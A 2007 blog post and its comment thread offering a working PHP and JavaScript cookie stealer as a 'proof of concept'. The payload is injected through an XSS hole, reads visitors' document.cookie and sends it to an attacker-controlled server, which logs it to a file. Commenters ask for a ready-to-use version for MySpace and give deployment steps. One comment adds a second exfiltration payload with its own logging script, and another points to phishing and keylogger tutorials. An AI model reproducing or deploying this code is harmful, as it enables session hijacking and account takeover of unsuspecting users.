PHP cookie stealer
Submitted by xqus on Mon, 04/16/2007 - 14:47
Here is a simple proof of concept cookie stealer.
To use it you have to exploit a XSS vulerability and insert (for example) the following code.
<script src="http://url.to/cookiemonster.php"></script>
The file ./cookies.txt must exist, and be writable to the script.
<?php /* * Created on 16. april. 2007 * Created by Audun Larsen (audun@munio.no) * * Copyright 2006 Munio IT, Audun Larsen * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ if(strlen($_SERVER['QUERY_STRING']) > 0) { $fp=fopen('./cookies.txt', 'a'); fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."\n"); fclose($fp); } else { ?> var ownUrl = 'http://<?php echo $_SERVER['HTTP_HOST']; ?><?php echo $_SERVER['PHP_SELF']; ?>'; // ==================================================================== // URLEncode and URLDecode functions // // Copyright Albion Research Ltd. 2002 // http://www.albionresearch.com/ // // You may copy these functions providing that // (a) you leave this copyright notice intact, and // (b) if you use these functions on a publicly accessible // web site you include a credit somewhere on the web site // with a link back to http://www.albionresearch.com/ // // If you find or fix any bugs, please let us know at albionresearch.com // // SpecialThanks to Neelesh Thakur for being the first to // report a bug in URLDecode() - now fixed 2003-02-19. // And thanks to everyone else who has provided comments and suggestions. // ==================================================================== function URLEncode(str) { // The Javascript escape and unescape functions do not correspond // with what browsers actually do... var SAFECHARS = "0123456789" + // Numeric "ABCDEFGHIJKLMNOPQRSTUVWXYZ" + // Alphabetic "abcdefghijklmnopqrstuvwxyz" + "-_.!~*'()"; // RFC2396 Mark characters var HEX = "0123456789ABCDEF"; var plaintext = str; var encoded = ""; for (var i = 0; i < plaintext.length; i++ ) { var ch = plaintext.charAt(i); if (ch == " ") { encoded += "+"; // x-www-urlencoded, rather than %20 } else if (SAFECHARS.indexOf(ch) != -1) { encoded += ch; } else { var charCode = ch.charCodeAt(0); if (charCode > 255) { alert( "Unicode Character '" + ch + "' cannot be encoded using standard URL encoding.\n" + "(URL encoding only supports 8-bit characters.)\n" + "A space (+) will be substituted." ); encoded += "+"; } else { encoded += "%"; encoded += HEX.charAt((charCode >> 4) & 0xF); encoded += HEX.charAt(charCode & 0xF); } } } // for return encoded; }; cookie = URLEncode(document.cookie); html = '<img src="'+ownUrl+'?'+cookie+'">'; document.write(html); < ?php } ?>
its look great and thank you for your generosity to share it with us .... but! can you please make it more easer for people who don't know anything about PHP and its stuff "like me!" .... in other words can you make it as a ready PHP pages that the people can download it and then upload it to they own sites to use it! just like other "codes library sites" that give the codes "cut & past" with few instructions,
in case you want send me email my address:
a n k i d o o [at] g m a i l [dot] c o m
thanks again and forgive me for my stupid reply.
have a nice time
- reply
Submitted by mirox on Sat, 06/23/2007 - 10:14.ok well i need to know a html code cookie stealer code so i can put it on myspace profile,
and email it to me at
YamahaRider848@aol.com be all like put this in your profile and then it will email it to you or iduno i know what im doing kinda i guess im a noob lol but i learning so shut up there is only one way to learn and its to ask ppl who know so plz email me at YamahaRider848@aol.com
- reply
Submitted by 1478963 on Thu, 07/26/2007 - 04:00.You can't use html noob, rtfm @ php.net
- reply
Submitted by Anonymous (not verified) on Sun, 10/14/2007 - 19:34.Copy and paste the php code into a text and than re-name it to .php, you need to upload it into a ftp that allows PHP and allows code writting.
- reply
Submitted by Anonymous (not verified) on Sun, 12/23/2007 - 02:05.Well you need a free php hosting site or your site that allows "write permission" and works with php. Copy the php code and Save the out-put as Cookie_Monster.php
Be sure to also make a log file called ./cookies.txt
Put that with the rest files in same folder on your site.
Than you can use JPG Exploit to in0bed your evil code"
(Works wt Internet Explorer)
Remember you need to find XSS exploit before you can use this:
Example: www.site.com/forums/login.asp?=%3Cscript%20src=%22http://url.to/Cookie_M...
that is a hole but learn more about xss by Goggling it.
Reference:
Using JPG Exploit
1. Open notepad (create new file)
2. Example C0de:
3. Save As... pic.jpg
4. upload to web site
5. view image with Internet Explorer
6. You can use any script you wish.
BEST WISHES!
- reply
Submitted by DoZ (not verified) on Sun, 12/23/2007 - 02:17.Hi all. First can I say that I aint a clue where to start here, but im a member of www.messblack.com and on there it gives you tuts on how to use a fake log in page and keyloggers its a bit more easier to understand than this cookie stealing. Go check the sight out for yourself and if you need any help come on to the forun (off topic) and look for me my name on there is snugglebums
- reply
Submitted by Anonymous (not verified) on Sat, 02/02/2008 - 22:53.Look, if you want to steal cookies study XSS.
A simple example would be <body onload="document.location='mysite.com/cookiestealer.php?cookie=' + document.cookie">
Then have a simple log script with the get variable on your php server:
<?php
$cookie = urldecode($_GET['cookie']);
$fp = open("log.txt", "a");
fwrite($fp, "$cookie \n");
fclose($fp);
?>
- reply
Submitted by human_bagel (not verified) on Fri, 02/29/2008 - 04:06.Post new comment